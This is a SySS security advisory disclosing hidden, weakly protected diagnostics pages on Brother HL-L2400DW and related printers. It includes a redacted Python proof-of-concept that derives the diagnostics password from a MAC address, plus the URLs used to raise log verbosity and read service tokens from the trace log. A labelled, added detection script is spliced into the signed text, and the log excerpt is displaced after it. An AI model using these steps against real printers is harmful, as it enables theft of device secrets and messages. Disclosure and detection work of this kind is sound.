-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2025-008
Product: Multiple products are affected (see [1], [2], [3])
Manufacturer: Brother Industries, Ltd., Konica Minolta, Inc.,
              Ricoh Company, Ltd.
Affected Version(s): Versions depend on the vulnerable product and
                     vendor (see [1], [2], [3])
Tested Version(s): 1.17 of the Brother HL-L2400DW Printer
Vulnerability Type: Hidden Functionality (CWE-912)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2025-02-13
Solution Date: 2026-01-29
Public Disclosure: 2026-01-29
CVE Reference: CVE-2025-55704
Author of Advisory: Jan Wütherich, Albstadt-Sigmaringen University

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:

The Brother HL-L2400DW Printer is a laser printer with networking
capabilities.

The manufacturer describes the product as follows (see [4]):

"The HL-L2400DW is designed to increase efficiency, with fast print
speeds helping you to work smarter. The 2-sided print feature saves you
time, enabling you to get on with other tasks. Make your day easier and
your printing effortless, with simple set up and 5GHz WiFi or USB
connection. This efficient HL-2400DW is a breeze to operate using the
easy to navigate control panel."

Insufficient protection of diagnostics pages can allow an attacker to
gain access to the device logs. Furthermore, the log level can be
modified, resulting in the logging of sensitive data, such as device
tokens. This, in turn, can lead to the exposure of sensitive
information to unauthorized users on the network.

While SySS verified the vulnerability for the Brother HL-L2400DW
Printer with firmware version 1.17, multiple devices from multiple
manufacturers are affected by the same issue (see [1], [2], [3]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:

By analyzing the firmware of the device, several hidden diagnostics
pages of the web interface were discovered.
The diagnostics pages are protected using HTTP digest access
authentication. The username is hardcoded to the value "diaguser" and
the password is derived from the device's MAC address. For this, the
MAC address is scrambled using a hardcoded pattern and is then hashed
using SHA256. The resulting hash is converted to hexadecimal values
with alternating uppercase and lowercase letters, resulting in the
final password. Thus, an attacker can figure out the password simply by
knowing the MAC address of the device. This allows retrieving a
trace_log.txt containing several device logs.

One part of the diagnostics pages is the settings page, which allows
modifying various logging options using URL parameters. By changing the
log level to a higher verbosity, sensitive device secrets can be
obtained from the trace log when the device retrieves them. Using these
secrets, the attacker can retrieve e-mails sent to the printer from the
Brother online services.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):

The following tool was developed to generate the diagnostics password
using the MAC address as input. The scramble indices and format string
characters have been replaced with an 'X'.
#!/usr/bin/env python3
from hashlib import sha256
import sys

# MAC address passed as the first argument, e.g. 00:00:5E:00:53:00
MAC = [int(x, 16) for x in sys.argv[1].split(":")]

# Hardcoded scramble table; the indices are redacted in this advisory
SCRAMBLE = [
    [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ],
    [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ],
    [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ],
    [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ],
    [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ],
    [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ]
]

if __name__ == "__main__":
    # The last MAC byte selects one of the six scramble rows
    index = MAC[5] % 6
    # Fixed format characters (redacted) interleaved with the scrambled
    # MAC bytes form the string that is hashed
    text = f"XXX{MAC[SCRAMBLE[index][0]]:02X}"
    text += f"XXX{MAC[SCRAMBLE[index][1]]:02X}"
    text += f"XX{MAC[SCRAMBLE[index][2]]:02X}"
    text += f"XX{MAC[SCRAMBLE[index][3]]:02X}"
    text += f"XX{MAC[SCRAMBLE[index][4]]:02X}"
    text += f"XX{MAC[SCRAMBLE[index][5]]:02X}XX"
    thash = sha256(text.encode("ascii"))
    # Hex digest with alternating lowercase/uppercase bytes
    print("[i] Diagnostics password: ", end="")
    for i, b in enumerate(thash.digest()):
        if (i & 1) == 0:
            print(f"{b:02x}", end="")
        else:
            print(f"{b:02X}", end="")
    print()

The following output then demonstrates retrieving the password with a
documentation MAC address. A real MAC address could be retrieved from
the ARP cache.

$ python diagnostics_password.py 00:00:5E:00:53:00
[i] Diagnostics password: 203E1c9671C26bE5b4159d0B037B2cA3d0944058976240F8390DeaA1fa657e48

This then allows logging in to the diagnostics pages, where the log
verbosity can be changed with the following URL:

https://10.10.0.10/diagnostics/boc/setting?filter_level=N&log_size_limit=65536

The trace log can now be monitored using the following URL:

https://10.10.0.10/diagnostics/boc/trace_log.txt

If a user now sets up the Brother online services using the web
interface, a device access token, access token secret, consumer key,
and consumer key secret will be logged to the trace_log. These secrets
can then be used to listen to messages sent from the Brother online
services to the printer.
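For defenders, the two diagnostics URLs and the hardcoded "diaguser"
account are the observable footprint of this issue. The following
detection script is an added example and is not part of the advisory or
of any vendor tooling. It assumes the printer's web interface is fronted
by a TLS-terminating reverse proxy or an IDS that records requests in
Common Log Format with the authenticated user in the third field; the
log lines, the client addresses and the filter_level value 7 are
constructed for the example.

```python
#!/usr/bin/env python3
"""Flag access to hidden printer diagnostics pages in HTTP access logs.

Constructed detection example for the issue described in SYSS-2025-008.
Assumes Common Log Format records from a proxy/IDS in front of the
printer; the sample lines below are constructed, not captured.
"""
import re
from dataclasses import dataclass
from typing import Iterable, Optional
from urllib.parse import parse_qs, urlsplit

# Endpoint paths and account name as given in the advisory text.
DIAG_PREFIX = "/diagnostics/"
DIAG_USER = "diaguser"
SETTING_PATH = "/diagnostics/boc/setting"
TRACE_LOG_PATH = "/diagnostics/boc/trace_log.txt"

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


@dataclass(frozen=True)
class Alert:
    client: str
    rule: str
    severity: str
    detail: str


def parse_line(line: str) -> Optional[dict]:
    """Parse one CLF line; return None for lines that do not match."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def check_request(rec: dict) -> list[Alert]:
    """Apply the diagnostics-page rules to one parsed request."""
    alerts: list[Alert] = []
    url = urlsplit(rec["target"])
    path, client = url.path, rec["host"]

    # Anything under /diagnostics/ is hidden functionality that is never
    # reached through the documented web interface.
    if path.startswith(DIAG_PREFIX):
        alerts.append(Alert(client, "hidden-diagnostics-access", "medium",
                            f"{rec['method']} {path} -> {rec['status']}"))

    # The hardcoded diagnostics account is only used by these pages.
    if rec["user"] == DIAG_USER:
        alerts.append(Alert(client, "diaguser-authenticated", "medium",
                            f"digest user {DIAG_USER} accepted ({rec['status']})"))

    # A successful change of the trace filter level means secrets such as
    # the online-service tokens will start to land in trace_log.txt.
    if path == SETTING_PATH and rec["status"].startswith("2"):
        params = parse_qs(url.query)
        if "filter_level" in params:
            alerts.append(Alert(client, "log-level-changed", "high",
                                f"filter_level={params['filter_level'][0]}"))

    # Retrieval of the trace log is the step that exposes the secrets.
    if path == TRACE_LOG_PATH and rec["status"] == "200":
        alerts.append(Alert(client, "trace-log-read", "high",
                            f"{rec['size']} bytes returned"))
    return alerts


def analyze(lines: Iterable[str]) -> list[Alert]:
    """Run every parseable line through the rules and collect the alerts."""
    alerts: list[Alert] = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            alerts.extend(check_request(rec))
    return alerts


# Constructed sample: ordinary admin traffic, then an unauthenticated
# probe, a log-level change and a trace-log download from one client.
SAMPLE_LOG = [
    '10.10.0.20 - - [29/Jan/2026:09:58:01 +0000] "GET /general/status.html HTTP/1.1" 200 4821',
    '10.10.0.50 - - [29/Jan/2026:10:00:00 +0000] "GET /diagnostics/boc/setting HTTP/1.1" 401 0',
    '10.10.0.50 - diaguser [29/Jan/2026:10:00:01 +0000] "GET /diagnostics/boc/setting?filter_level=7&log_size_limit=65536 HTTP/1.1" 200 312',
    '10.10.0.50 - diaguser [29/Jan/2026:10:05:12 +0000] "GET /diagnostics/boc/trace_log.txt HTTP/1.1" 200 65536',
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(f"[{a.severity}] {a.client} {a.rule}: {a.detail}")
```

The 401 on the first probe already raises a medium alert, so the rule
set fires before the password derivation has even been exercised; the
two high-severity alerts mark the point at which the device starts
writing its online-service tokens to the trace log and the point at
which that log leaves the device. Until the vendor firmware update is
applied, blocking the /diagnostics/ prefix at the same proxy is the
corresponding compensating control.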
< 1130> [mysora_Utility.c:331] N: success: true
< 1130> [mysora_Utility.c:378] N: code: 200
< 1130> [mysora_Utility.c:437] N: message: Success
< 1130> [mysora_Utility.c:437] N: access_token: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
< 1130> [mysora_Utility.c:437] N: access_token_secret: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
< 1130> [mysora_Utility.c:437] N: consumer_key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
< 1130> [mysora_Utility.c:437] N: consumer_secret: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
< 1130> [mysora_Utility.c:437] N: device_id: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:

Update to the latest firmware version of the affected device
(see [1], [2], [3]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:

2025-01-09: Vulnerability discovered
2025-02-13: Vulnerability reported to manufacturer
2026-01-29: Patch released by manufacturer
2026-01-29: Public disclosure of vulnerability by manufacturer
2026-02-02: Public disclosure of vulnerability by SySS

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:

[1] Affected Brother Industries, Ltd. devices
    https://faq.brother.co.jp/app/answers/detail/a_id/13716
    https://faq.brother.co.jp/euf/assets/pdf/13716%E2%80%9720260128.pdf
[2] Affected Konica Minolta, Inc. devices
    https://www.konicaminolta.com/global-en/security/advisory/pdf/km-2026-0001.pdf
[3] Affected Ricoh Company, Ltd. devices
    https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2026-000001
[4] Datasheet for HL-L2400DW
    https://www.brother.eu/-/media/Product-Downloads/Devices/Printers/HL/HLL2400DW/HL-L2400DW---Datasheet.ashx
[5] SySS Security Advisory SYSS-2025-008
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-008.txt
[6] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:

This security vulnerability was discovered by students of the
Albstadt-Sigmaringen University in cooperation with SySS GmbH.

Jan Wütherich - jan[at]wuetherich[dot]de, wuetheja@hs-albsig.de
Manuel Schuttenberg - manuel[at]schuttenberg[dot]net, schuttma@hs-albsig.de
Simon Häupler - haeuplsi@hs-albsig.de
Marvin Härter - haertema@hs-albsig.de
Silas Feuerherdt - feuerhsi@hs-albsig.de
Timm Ditz - ditztimm@hs-albsig.de
Saeed Brezek - brezeksa@hs-albsig.de

Supervised by:
Simon Malik - maliks@hs-albsig.de
Prof. Holger Morgenstern - morgenstern@hs-albsig.de

Contact SySS GmbH:
E-Mail: anton.fabricius@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Anton_Fabricius.asc
Key ID: 0xB2ED52BF0DEAC709
Key Fingerprint: 3476 F352 EBC1 F702 5048 B573 B2ED 52BF 0DEA C709

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEENHbzUuvB9wJQSLVzsu1Svw3qxwkFAmmAnLQACgkQsu1Svw3q
xwkAjg/8CaFQ0Y13v8pMRVSo2XGnq5RHsvD5+6nJf5PVVo8znE+h11r4cwkBzPIV
flFMNzX82rdqL3RFiPEzr376Q9BBXmHsSb6ktFkbdUBwWp90rH1a+T+tqHaCi2ab
J0+w/seLFifCUnLnQmgDsald9LryUL4o9TUbWRfSibNOvLKtLA1H+UqOH5k0egKJ
3m4p3Ouv/oeyufwpzcerCIgAqm9ELEDdm6Vp+QflYikOscVY3U9ErQayd/STx0ad
gQ6As7LSfgx9u4EgfvapeW9DB0dw85hM7mJFgggNMKnrcOvHZuKATtvDGFqagE0q
b6Ze2q9wlF0ifsqypHS1IJLxSlEzO4ohGHAxIsH5MBwpConZuW0hSbCc3J08RazF
mvtqzIYco+TcIPmHoOxmMIf/C5gBsJSIVhBFt9ckp2D6BZomALpbFHwAKIFy7Fbf
Gw5FDbjEFV3j6Ipw6tFu9zHh4JOR7yE4bIz9RN3cwHTbopiEtYxzBCPi0UjBdTLY
Ty1ppK+TlNvURaGOoVvLLX1J42bYuKqHMlBcbZj18Q5MRLEw4ozazWBvYaBENyz+
Bn8WIfRBDlnlsx3eMyTtUG/ZwCOS5+AqETZQRwnpsjW8tLy/6PzuUY2FaOlComUb
rFJCG96bvAKCLEpL7L5rwQ2TKdvM2bif8FGQnVNBpXmUYafASrk=
=jt/t
-----END PGP SIGNATURE-----